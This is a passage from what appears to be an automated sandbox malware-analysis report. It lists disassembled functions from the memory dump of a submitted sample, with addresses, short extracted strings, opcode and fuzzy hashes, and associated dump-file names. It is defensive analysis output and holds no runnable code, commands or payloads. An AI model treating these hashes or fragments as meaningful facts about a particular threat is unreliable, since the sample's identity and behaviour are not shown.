                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$__ZN
                                    • API String ID: 0-1427190319
                                    • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction ID: f2a1fcc32b60eb68451fd33e7ebbd332f2c05ee99343aa1f1a10f56beab5de5f
                                    • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction Fuzzy Hash: 73721272908B189BD714CF18C8906BAB7E3BFC5310F598A1DFBA69B391D7709C419B81
                                    Function 00ADC305 Relevance: 2.8, Strings: 1, Instructions: 1600COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ~
                                    • API String ID: 0-2946903494
                                    • Opcode ID: 278ebe8acb3d5264434875092daf1f04241a366e1302d6d79b2e4c4e644309c5
                                    • Instruction ID: ee6fa37a26bcfc34b34582f02973c7acccc96a7ca7f980e78031f9db217d31ef
                                    • Opcode Fuzzy Hash: 278ebe8acb3d5264434875092daf1f04241a366e1302d6d79b2e4c4e644309c5
                                    • Instruction Fuzzy Hash: 69B2F4F360C2049FE304BE2DEC8567ABBE9EF94720F16893DE6C483744EA3559058697
                                    Function 00A94BD3 Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F<{'$F<{'
                                    • API String ID: 0-2745900745
                                    • Opcode ID: 2f331e7f73ed3dd6b301a54b4d91bf2a80e3ccf4ee8e37ee8e4530a041f0a29d
                                    • Instruction ID: c3f229bf614783071bb28ac234aa399e3b4b845d301fb5f6bae5a0f35ab51698
                                    • Opcode Fuzzy Hash: 2f331e7f73ed3dd6b301a54b4d91bf2a80e3ccf4ee8e37ee8e4530a041f0a29d
                                    • Instruction Fuzzy Hash: F97116F36083089FE304AE2DDC4476BB7DADBD0720F19893DEA85C7784E935AD058656
                                    Function 009EF3C0 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0Fe/$8W}
                                    • API String ID: 0-3065181798
                                    • Opcode ID: c750390556eb2ed3375e6c263d97b80921fca933fa1fa25c166a0e58b8821e6e
                                    • Instruction ID: 438ad8997aab3cf5ff5d8b0fc18933cbd35bffae0e9f854469b105921bf0ddfe
                                    • Opcode Fuzzy Hash: c750390556eb2ed3375e6c263d97b80921fca933fa1fa25c166a0e58b8821e6e
                                    • Instruction Fuzzy Hash: 775147F3A483149FE3046E3DED8536ABBD5EB94320F1B453DEB88D3780E93958058296
                                    Function 006D5DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: xn--
                                    • API String ID: 0-2826155999
                                    • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction ID: 0aff9fc3f576700e821fe0cf8f665787921c687adfc2bfec86137408f5a70d92
                                    • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction Fuzzy Hash: D7A2F4B1C042688AEF28CB58C8907EDB7B3EF55300F1842ABE4567B381D7759E85DB61
                                    Function 006D4DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction ID: 5d1472164a70f7d9a8428a58cc7afc846967a30d0fdcff03910ae4b4fa51632f
                                    • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction Fuzzy Hash: A2E1AC31A083459FC725DF28C8817AEB7E3ABC9300F55492EE5DA9B391DB319C45CB86
                                    Function 006D4868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction ID: 766fc78835abb020215606e984a83e1990d9a7d44b4aa12c4a71d88bd299ad14
                                    • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction Fuzzy Hash: ABE1A131A083059FCB24CF18C8917AEB7E7EFC9310F15892EE9999B351DB30AC458B46
                                    Function 006EE258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: UNC\
                                    • API String ID: 0-505053535
                                    • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction ID: 21f51efadb9708ac47b0052f504e94bd0e7ed1b81e5a7818a38c2aaf7988abb7
                                    • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction Fuzzy Hash: F1E11671D057A58EEB10CF5AC8843EEBBE3AB85314F298169D4A45B3D2D3378D46CB90
                                    Function 009E88CB Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 9S
                                    • API String ID: 0-2114136402
                                    • Opcode ID: 24dcb53b9ce4a083e994c0f61a311cd7a128e489d34e331393d43d5a200ddd51
                                    • Instruction ID: d584edc6485d4d32af9846df578940bad0d1b857f51dc65e624276c060408e4e
                                    • Opcode Fuzzy Hash: 24dcb53b9ce4a083e994c0f61a311cd7a128e489d34e331393d43d5a200ddd51
                                    • Instruction Fuzzy Hash: B861E4F3A087049FF7086E29EC8577ABBD5EBC4320F1A453DEBC587384E97908418696
                                    Function 00A979D6 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 1}_
                                    • API String ID: 0-1874052367
                                    • Opcode ID: af005afa4267dc486aaf968249071d6de8945da2cd00f6070f0500ddfe89c394
                                    • Instruction ID: 1f7178aa60dffb076612af40e9ffba10e7f3b44277378d93fd2273654c7f85f2
                                    • Opcode Fuzzy Hash: af005afa4267dc486aaf968249071d6de8945da2cd00f6070f0500ddfe89c394
                                    • Instruction Fuzzy Hash: E3615AF3A081045BE3046A2DED4577AFBDADFD4720F1A863DE9C4D7784E93698058682
                                    Function 006AE544 Relevance: .8, Instructions: 823COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                    • Instruction ID: 9eba3447217b151a4dfbd7caa577a0689040c7dff55809dc8413c97e4e3540ad
                                    • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                    • Instruction Fuzzy Hash: 5A82E1B5900F448FD765CF29C880B92B7E2BF5A300F548A2ED9EA8B751DB31B945CB50
                                    Function 006C8E78 Relevance: .6, Instructions: 649COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                    • Instruction ID: 2d9f8ad7a2b76c3b7207415f3cda662e2f0e68ce98f5fdab9dc27882e10e8145
                                    • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
